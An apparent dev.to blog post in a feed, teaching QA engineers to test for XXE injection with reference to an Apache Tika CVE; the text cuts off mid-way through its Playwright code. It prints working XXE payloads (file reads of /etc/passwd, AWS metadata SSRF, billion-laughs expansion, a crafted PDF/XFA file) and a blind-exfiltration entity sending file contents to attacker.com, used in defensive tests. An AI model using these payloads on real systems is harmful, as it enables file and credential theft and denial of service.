The latest articles on Forem by Yuriy Safronnynov (@ysafron). https://forem.com/ysafron https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3855988%2F35f6f1ac-5cd1-4506-9c2a-cdac3ae2ac0b.jpg https://forem.com/ysafron en Yuriy Safronnynov Sun, 17 May 2026 14:00:00 +0000 https://forem.com/ysafron/xml-external-entities-xxe-1a99 https://forem.com/ysafron/xml-external-entities-xxe-1a99 <p>Your application receives an XML file. It looks like a normal invoice, a configuration payload, a SOAP request, or a PDF. Your parser opens it.</p> <p>Inside the XML is a DOCTYPE declaration that defines an external entity pointing to /etc/passwd. The parser resolves the entity, reads the file, and inserts the content into the parsed document. Your application returns a response that includes the contents of /etc/passwd.</p> <p>The attacker has your system file. You have a perfect 200 OK in your test suite.</p> <h2> TL;DR </h2> <ul> <li>XXE lets an attacker embed a malicious XML entity inside a document or request your server parses. The parser fetches the entity, the attacker reads the result. No authentication required.</li> <li>CVE-2025-66516 in Apache Tika scored CVSS 10.0. A crafted PDF containing malicious XFA content triggered XXE in tika-core, exposing sensitive files and enabling SSRF. Over 565 vulnerable instances exposed at time of disclosure. Fixed in tika-core 3.2.2.</li> <li>Your test suite submits valid XML and asserts a correct response. It almost certainly never submits XML containing a DOCTYPE declaration with an external entity reference. That is the entire attack surface.</li> <li>Fix requires disabling external entity resolution in the XML parser configuration, not in input validation. Sanitizing the XML string is not sufficient and will be bypassed.</li> <li>AI tools generate tests that submit well-formed XML. They have no mechanism for generating malicious DOCTYPE payloads and no understanding of why those payloads matter.</li> </ul> <h2> What it is </h2> <p>XML External Entity injection (CWE-611) occurs when an application parses XML input that includes a DOCTYPE declaration defining an external entity reference, and the XML parser is configured to resolve those references.</p> <p>An external entity tells the parser to fetch content from an external source: a file path, a URL, or a network resource. When the parser resolves the entity, it retrieves that content and substitutes it into the XML document. If the application returns any part of the parsed document in its response, the attacker receives the fetched content.</p> <p>Developers introduce this because XML parsers in Java, Python, and most other languages enable external entity resolution by default as part of the XML specification. It is not a bug in the parser. It is a feature the parser exposes because the specification defines it and the developer never disabled it because they were focused on parsing valid XML, not on what happens when someone submits malicious XML.</p> <p>What makes XXE particularly dangerous is the range of attack vectors that trigger it. Direct API requests containing XML are the obvious case, but XXE also appears in file upload endpoints that accept XML-based formats such as DOCX, XLSX, SVG, RSS, SOAP payloads, and PDF files containing XML Forms Architecture (XFA) content.</p> <p>The attack can read arbitrary files the process has access to, perform SSRF by pointing the entity at internal network resources, and under certain parser configurations trigger denial of service via entity expansion attacks (the "billion laughs" variant).</p> <h2> Real world damage </h2> <p><strong>CVE-2025-66516 · Apache Tika · December 2025 · CVSS 10.0 (Critical)</strong></p> <p>On December 4, 2025, the Apache Software Foundation disclosed a maximum-severity XXE vulnerability in Apache Tika — the widely used open-source content analysis toolkit that extracts text and metadata from over a thousand file types.</p> <p>The vulnerability was triggered by submitting a PDF file containing a maliciously crafted XFA payload. When Tika parsed the PDF, the ore XML parser resolved the external entity references embedded in the XFA content without restriction, allowing an unauthenticated attacker to read sensitive files from the server's file system and perform SSRF by pointing entity references at internal network addresses.</p> <blockquote> <p>Source: Apache Software Foundation security advisory and<br> NVD CVE-2025-66516 (nvd.nist.gov/vuln/detail/CVE-2025-66516).<br> Affected: tika-core 1.13 through 3.2.1. Fixed in tika-core 3.2.2.</p> </blockquote> <p>The disclosure expanded the scope of a prior advisory, CVE-2025 54988 (CVSS 8.4), published in August 2025. Organizations that patched the tika-parser-pdf-module in response to the earlier advisory remained fully vulnerable because the actual fix required upgrading tika-core. This partial-patch scenario left hundreds of organizations exposed after believing they had remediated the issue. Censys observed 565 vulnerable instances exposed on the internet at time of disclosure.</p> <p>A QA engineer running XXE payload tests against the document upload endpoint would have caught this. The test is not complex: submit a PDF containing a DOCTYPE declaration with an external entity reference and assert the server returns 400, or that the response body does not contain file system content. That test did not exist.</p> <h2> The invisible bug problem </h2> <p>Test suites for XML-processing endpoints submit well-formed, valid XML and assert correct parsing behavior. The schema is validated. The content is checked. The response is correct.</p> <p>Nobody submits a DOCTYPE declaration, because nobody is writing tests from an attacker's perspective.</p> <p>The XXE surface is invisible to a test suite that only generates input the feature was designed to accept. The attack requires input that is syntactically valid XML but semantically adversarial. Valid XML parsers accept DOCTYPE declarations. The feature works perfectly. The test passes.</p> <p>The vulnerability is in the parser's willingness to resolve the entity and that behavior is never triggered by a test that submits a legitimate document.</p> <h2> How QA engineers catch it </h2> <p>The core principle: every endpoint that accepts XML input, regardless of format or file extension, must be tested with XXE payloads that attempt file system access, internal network access, and entity expansion. The assertion is not just that the response is incorrect — it is that the response does not contain file system content and that the parser did not make an outbound network request.</p> <h3> XXE payload reference </h3> <div class="highlight js-code-highlight"> <pre class="highlight xml"><code><span class="c">&lt;!-- Basic file read — Linux --&gt;</span> <span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span> <span class="cp">&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</span> ]&gt; <span class="nt">&lt;root&gt;&lt;data&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/data&gt;&lt;/root&gt;</span> <span class="c">&lt;!-- Basic file read — Windows --&gt;</span> <span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span> <span class="cp">&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"&gt;</span> ]&gt; <span class="nt">&lt;root&gt;&lt;data&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/data&gt;&lt;/root&gt;</span> <span class="c">&lt;!-- SSRF via entity — AWS metadata --&gt;</span> <span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span> <span class="cp">&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"&gt;</span> ]&gt; <span class="nt">&lt;root&gt;&lt;data&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/data&gt;&lt;/root&gt;</span> <span class="c">&lt;!-- Billion laughs — denial of service via entity expansion --&gt;</span> <span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span> <span class="cp">&lt;!DOCTYPE lolz [ &lt;!ENTITY lol "lol"&gt;</span> <span class="cp">&lt;!ENTITY lol2 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;</span> <span class="cp">&lt;!ENTITY lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;"&gt;</span> <span class="cp">&lt;!ENTITY lol4 "&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;"&gt;</span> ]&gt; <span class="nt">&lt;root&gt;&lt;data&gt;</span><span class="ni">&amp;lol4;</span><span class="nt">&lt;/data&gt;&lt;/root&gt;</span> <span class="c">&lt;!-- Parameter entity variant — blind XXE --&gt;</span> <span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span> <span class="cp">&lt;!DOCTYPE foo [ &lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;</span> <span class="cp">&lt;!ENTITY % eval "&lt;!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'&gt;</span>"&gt; %eval; ]&gt; <span class="nt">&lt;root&gt;&lt;data&gt;</span><span class="ni">&amp;exfil;</span><span class="nt">&lt;/data&gt;&lt;/root&gt;</span> </code></pre> </div> <h3> PyTest </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">pytest</span> <span class="kn">import</span> <span class="n">requests</span> <span class="n">BASE_URL</span> <span class="o">=</span> <span class="sh">"</span><span class="s">https://your-app.com</span><span class="sh">"</span> <span class="n">XXE_FILE_READ_LINUX</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;?xml version=</span><span class="sh">"</span><span class="s">1.0</span><span class="sh">"</span><span class="s"> encoding=</span><span class="sh">"</span><span class="s">UTF-8</span><span class="sh">"</span><span class="s">?&gt; &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM </span><span class="sh">"</span><span class="s">file:///etc/passwd</span><span class="sh">"</span><span class="s">&gt; ]&gt; &lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;</span><span class="sh">"""</span> <span class="n">XXE_FILE_READ_WINDOWS</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;?xml version=</span><span class="sh">"</span><span class="s">1.0</span><span class="sh">"</span><span class="s"> encoding=</span><span class="sh">"</span><span class="s">UTF-8</span><span class="sh">"</span><span class="s">?&gt; &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM </span><span class="sh">"</span><span class="s">file:///C:/Windows/win.ini</span><span class="sh">"</span><span class="s">&gt; ]&gt; &lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;</span><span class="sh">"""</span> <span class="n">XXE_SSRF</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;?xml version=</span><span class="sh">"</span><span class="s">1.0</span><span class="sh">"</span><span class="s"> encoding=</span><span class="sh">"</span><span class="s">UTF-8</span><span class="sh">"</span><span class="s">?&gt; &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM </span><span class="sh">"</span><span class="s">http://169.254.169.254/latest/meta-data/</span><span class="sh">"</span><span class="s">&gt; ]&gt; &lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;</span><span class="sh">"""</span> <span class="n">XXE_BILLION_LAUGHS</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;?xml version=</span><span class="sh">"</span><span class="s">1.0</span><span class="sh">"</span><span class="s"> encoding=</span><span class="sh">"</span><span class="s">UTF-8</span><span class="sh">"</span><span class="s">?&gt; &lt;!DOCTYPE lolz [ &lt;!ENTITY lol </span><span class="sh">"</span><span class="s">lol</span><span class="sh">"</span><span class="s">&gt; &lt;!ENTITY lol2 </span><span class="sh">"</span><span class="s">&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;</span><span class="sh">"</span><span class="s">&gt; &lt;!ENTITY lol3 </span><span class="sh">"</span><span class="s">&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;</span><span class="sh">"</span><span class="s">&gt; &lt;!ENTITY lol4 </span><span class="sh">"</span><span class="s">&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;</span><span class="sh">"</span><span class="s">&gt; ]&gt; &lt;root&gt;&lt;data&gt;&amp;lol4;&lt;/data&gt;&lt;/root&gt;</span><span class="sh">"""</span> <span class="n">FILE_SYSTEM_MARKERS</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">"</span><span class="s">root:x:</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">bin/bash</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">bin/sh</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">[extensions]</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">boot loader</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">ami-id</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">instance-id</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">security-credentials</span><span class="sh">"</span> <span class="p">]</span> <span class="n">XXE_PAYLOADS</span> <span class="o">=</span> <span class="p">[</span> <span class="p">(</span><span class="sh">"</span><span class="s">file_read_linux</span><span class="sh">"</span><span class="p">,</span> <span class="n">XXE_FILE_READ_LINUX</span><span class="p">,</span> <span class="sh">"</span><span class="s">application/xml</span><span class="sh">"</span><span class="p">),</span> <span class="p">(</span><span class="sh">"</span><span class="s">file_read_windows</span><span class="sh">"</span><span class="p">,</span> <span class="n">XXE_FILE_READ_WINDOWS</span><span class="p">,</span> <span class="sh">"</span><span class="s">application/xml</span><span class="sh">"</span><span class="p">),</span> <span class="p">(</span><span class="sh">"</span><span class="s">ssrf_metadata</span><span class="sh">"</span><span class="p">,</span> <span class="n">XXE_SSRF</span><span class="p">,</span> <span class="sh">"</span><span class="s">application/xml</span><span class="sh">"</span><span class="p">),</span> <span class="p">(</span><span class="sh">"</span><span class="s">billion_laughs</span><span class="sh">"</span><span class="p">,</span> <span class="n">XXE_BILLION_LAUGHS</span><span class="p">,</span> <span class="sh">"</span><span class="s">application/xml</span><span class="sh">"</span><span class="p">),</span> <span class="p">]</span> <span class="nd">@pytest.fixture</span> <span class="k">def</span> <span class="nf">auth_session</span><span class="p">():</span> <span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Session</span><span class="p">()</span> <span class="n">session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span> <span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">testuser</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">test_password</span><span class="sh">"</span> <span class="p">})</span> <span class="k">return</span> <span class="n">session</span> <span class="nd">@pytest.mark.parametrize</span><span class="p">(</span><span class="sh">"</span><span class="s">name,payload,content_type</span><span class="sh">"</span><span class="p">,</span> <span class="n">XXE_PAYLOADS</span><span class="p">)</span> <span class="k">def</span> <span class="nf">test_xxe_payload_rejected</span><span class="p">(</span><span class="n">auth_session</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="n">content_type</span><span class="p">):</span> <span class="c1"># CVE-2025-66516 pattern: parser must not resolve external entities </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/api/parse-xml</span><span class="sh">"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">Content-Type</span><span class="sh">"</span><span class="p">:</span> <span class="n">content_type</span><span class="p">}</span> <span class="p">)</span> <span class="k">assert</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">403</span><span class="p">,</span> <span class="mi">422</span><span class="p">],</span> <span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">XXE payload </span><span class="sh">'</span><span class="si">{</span><span class="n">name</span><span class="si">}</span><span class="sh">'</span><span class="s"> not rejected — </span><span class="sh">"</span> <span class="sa">f</span><span class="sh">"</span><span class="s">returned </span><span class="si">{</span><span class="n">response</span><span class="p">.</span><span class="n">status_code</span><span class="si">}</span><span class="sh">"</span> <span class="p">)</span> <span class="nd">@pytest.mark.parametrize</span><span class="p">(</span><span class="sh">"</span><span class="s">name,payload,content_type</span><span class="sh">"</span><span class="p">,</span> <span class="n">XXE_PAYLOADS</span><span class="p">)</span> <span class="k">def</span> <span class="nf">test_xxe_no_file_system_content_in_response</span><span class="p">(</span><span class="n">auth_session</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="n">content_type</span><span class="p">):</span> <span class="c1"># even a rejected request must not echo file system content </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/api/parse-xml</span><span class="sh">"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">Content-Type</span><span class="sh">"</span><span class="p">:</span> <span class="n">content_type</span><span class="p">}</span> <span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span> <span class="k">for</span> <span class="n">marker</span> <span class="ow">in</span> <span class="n">FILE_SYSTEM_MARKERS</span><span class="p">:</span> <span class="k">assert</span> <span class="n">marker</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">body</span><span class="p">,</span> <span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">File system content </span><span class="sh">'</span><span class="si">{</span><span class="n">marker</span><span class="si">}</span><span class="sh">'</span><span class="s"> found in response </span><span class="sh">"</span> <span class="sa">f</span><span class="sh">"</span><span class="s">for XXE payload </span><span class="sh">'</span><span class="si">{</span><span class="n">name</span><span class="si">}</span><span class="sh">'"</span> <span class="p">)</span> <span class="k">def</span> <span class="nf">test_xxe_pdf_upload_with_xfa_payload</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># CVE-2025-66516: XFA content inside PDF triggers XXE in tika-core </span> <span class="c1"># construct a minimal PDF with embedded XXE in XFA stream </span> <span class="n">xxe_xfa</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"""</span><span class="s">%PDF-1.4 1 0 obj &lt;&lt; /Type /Catalog /Pages 2 0 R /AcroForm &lt;&lt; /XFA 3 0 R &gt;&gt; &gt;&gt; endobj 2 0 obj &lt;&lt; /Type /Pages /Kids [] /Count 0 &gt;&gt; endobj 3 0 obj &lt;&lt; /Length 200 &gt;&gt; stream &lt;?xml version=</span><span class="sh">"</span><span class="s">1.0</span><span class="sh">"</span><span class="s"> encoding=</span><span class="sh">"</span><span class="s">UTF-8</span><span class="sh">"</span><span class="s">?&gt; &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM </span><span class="sh">"</span><span class="s">file:///etc/passwd</span><span class="sh">"</span><span class="s">&gt; ]&gt; &lt;xfa:data xmlns:xfa=</span><span class="sh">"</span><span class="s">http://www.xfa.org/schema/xfa-data/1.0/</span><span class="sh">"</span><span class="s">&gt; &lt;data&gt;&amp;xxe;&lt;/data&gt; &lt;/xfa:data&gt; endstream endobj xref 0 4 0000000000 65535 f trailer &lt;&lt; /Size 4 /Root 1 0 R &gt;&gt; startxref 0 %%EOF</span><span class="sh">"""</span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/api/upload-document</span><span class="sh">"</span><span class="p">,</span> <span class="n">files</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">file</span><span class="sh">"</span><span class="p">:</span> <span class="p">(</span><span class="sh">"</span><span class="s">test.pdf</span><span class="sh">"</span><span class="p">,</span> <span class="n">xxe_xfa</span><span class="p">,</span> <span class="sh">"</span><span class="s">application/pdf</span><span class="sh">"</span><span class="p">)}</span> <span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span> <span class="k">for</span> <span class="n">marker</span> <span class="ow">in</span> <span class="n">FILE_SYSTEM_MARKERS</span><span class="p">:</span> <span class="k">assert</span> <span class="n">marker</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">body</span><span class="p">,</span> <span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">File system content </span><span class="sh">'</span><span class="si">{</span><span class="n">marker</span><span class="si">}</span><span class="sh">'</span><span class="s"> found in PDF/XFA XXE response</span><span class="sh">"</span> <span class="p">)</span> <span class="k">def</span> <span class="nf">test_valid_xml_still_parses_correctly</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># confirm XXE protection does not break legitimate XML processing </span> <span class="n">valid_xml</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;?xml version=</span><span class="sh">"</span><span class="s">1.0</span><span class="sh">"</span><span class="s"> encoding=</span><span class="sh">"</span><span class="s">UTF-8</span><span class="sh">"</span><span class="s">?&gt; &lt;config&gt; &lt;setting name=</span><span class="sh">"</span><span class="s">timeout</span><span class="sh">"</span><span class="s">&gt;30&lt;/setting&gt; &lt;setting name=</span><span class="sh">"</span><span class="s">retries</span><span class="sh">"</span><span class="s">&gt;3&lt;/setting&gt; &lt;/config&gt;</span><span class="sh">"""</span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/api/parse-xml</span><span class="sh">"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">valid_xml</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">Content-Type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">application/xml</span><span class="sh">"</span><span class="p">}</span> <span class="p">)</span> <span class="k">assert</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span> </code></pre> </div> <h3> Robot Framework </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>*** Settings *** Library RequestsLibrary Library Collections Library OperatingSystem *** Variables *** ${BASE_URL} https://your-app.com ${XXE_FILE_READ} ... &lt;?xml version="1.0" encoding="UTF-8"?&gt; ... &lt;!DOCTYPE foo [ ... &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; ... ]&gt; ... &lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt; ${XXE_SSRF} ... &lt;?xml version="1.0" encoding="UTF-8"?&gt; ... &lt;!DOCTYPE foo [ ... &lt;!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"&gt; ... ]&gt; ... &lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt; ${XXE_BILLION_LAUGHS} ... &lt;?xml version="1.0" encoding="UTF-8"?&gt; ... &lt;!DOCTYPE lolz [ ... &lt;!ENTITY lol "lol"&gt; ... &lt;!ENTITY lol2 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt; ... &lt;!ENTITY lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;"&gt; ... ]&gt; ... &lt;root&gt;&lt;data&gt;&amp;lol3;&lt;/data&gt;&lt;/root&gt; @{FILE_SYSTEM_MARKERS} ... root:x: bin/bash bin/sh ... [extensions] ami-id instance-id *** Test Cases *** XXE File Read Payload Must Be Rejected # CVE-2025-66516: external entity pointing to file system must not resolve Create Session app ${BASE_URL} ${headers}= Create Dictionary Content-Type=application/xml ${response}= POST On Session app /api/parse-xml ... data=${XXE_FILE_READ} headers=${headers} expected_status=any Should Be True ${response.status_code} in [400, 403, 422] ... msg=XXE file read payload not rejected FOR ${marker} IN @{FILE_SYSTEM_MARKERS} Should Not Contain ${response.text} ${marker} ... msg=File system content '${marker}' in XXE response END XXE SSRF Payload Must Be Rejected Create Session app ${BASE_URL} ${headers}= Create Dictionary Content-Type=application/xml ${response}= POST On Session app /api/parse-xml ... data=${XXE_SSRF} headers=${headers} expected_status=any Should Be True ${response.status_code} in [400, 403, 422] ... msg=XXE SSRF payload not rejected FOR ${marker} IN @{FILE_SYSTEM_MARKERS} Should Not Contain ${response.text} ${marker} END XXE Billion Laughs Must Not Cause Timeout Create Session app ${BASE_URL} ${headers}= Create Dictionary Content-Type=application/xml ${response}= POST On Session app /api/parse-xml ... data=${XXE_BILLION_LAUGHS} headers=${headers} ... expected_status=any timeout=10 Should Be True ${response.status_code} in [400, 403, 422] ... msg=Billion laughs payload not rejected — possible DoS risk Valid XML Still Parses Correctly # confirm protection does not break legitimate XML processing ${valid_xml}= Set Variable ... &lt;?xml version="1.0"?&gt;&lt;config&gt;&lt;setting&gt;30&lt;/setting&gt;&lt;/config&gt; Create Session app ${BASE_URL} ${headers}= Create Dictionary Content-Type=application/xml ${response}= POST On Session app /api/parse-xml ... data=${valid_xml} headers=${headers} Should Be Equal As Strings ${response.status_code} 200 </code></pre> </div> <h3> TypeScript — Playwright API testing </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">test</span><span class="p">,</span> <span class="nx">expect</span><span class="p">,</span> <span class="nx">APIRequestContext</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@playwright/test</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">XXE_PAYLOADS</span> <span class="o">=</span> <span class="p">{</span> <span class="na">fileReadLinux</span><span class="p">:</span> <span class="s2">`&lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; ]&gt; &lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;`</span><span class="p">,</span> <span class="na">fileReadWindows</span><span class="p">:</span> <span class="s2">`&lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"&gt; ]&gt; &lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;`</span><span class="p">,</span> <span class="na">ssrfMetadata</span><span class="p">:</span> <span class="s2">`&lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"&gt; ]&gt; &lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;`</span><span class="p">,</span> <span class="na">billionLaughs</span><span class="p">:</span> <span class="s2">`&lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;!DOCTYPE lolz [ &lt;!ENTITY lol "lol"&gt; &lt;!ENTITY lol2 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt; &lt;!ENTITY lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;"&gt; &lt;!ENTITY lol4 "&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;"&gt; ]&gt; &lt;root&gt;&lt;data&gt;&amp;lol4;&lt;/data&gt;&lt;/root&gt;`</span><span class="p">,</span> <span class="p">};</span> <span class="kd">const</span> <span class="nx">FILE_SYSTEM_MARKERS</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">root:x:</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">bin/bash</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">bin/sh</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">[extensions]</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">boot loader</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">ami-id</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">instance-id</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">security-credentials</span><span class="dl">'</span><span class="p">,</span> <span class="p">];</span> <span class="kd">let</span> <span class="nx">apiContext</span><span class="p">:</span> <span class="nx">APIRequestContext</span><span class="p">;</span> <span class="nx">test</span><span class="p">.</span><span class="nf">beforeAll</span><span class="p">(</span><span class="k">async </span><span class="p">({</span> <span class="nx">playwright</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">apiContext</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">playwright</span><span class="p">.</span><span class="nx">request</span><span class="p">.</span><span class="nf">newContext</span><span class="p">({</span> <span class="na">baseURL</span><span class="p">:</span> <span class="dl">'</span><span class="s1">https://your-app.com</span><span class="dl">'</span><span class="p">,</span> <span class="p">});</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/login</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">username</span><span class="p">:</span> <span class="dl">'</span><span class="s1">testuser</span><span class="dl">'</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="dl">'</span><span class="s1">test_password</span><span class="dl">'</span> <span class="p">}</span> <span class="p">});</span> <span class="p">});</span> <span class="nx">test</span><span class="p">.</span><span class="nf">afterAll</span><span class="p">(</span><span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">dispose</span><span class="p">();</span> <span class="p">});</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="p">[</span><span 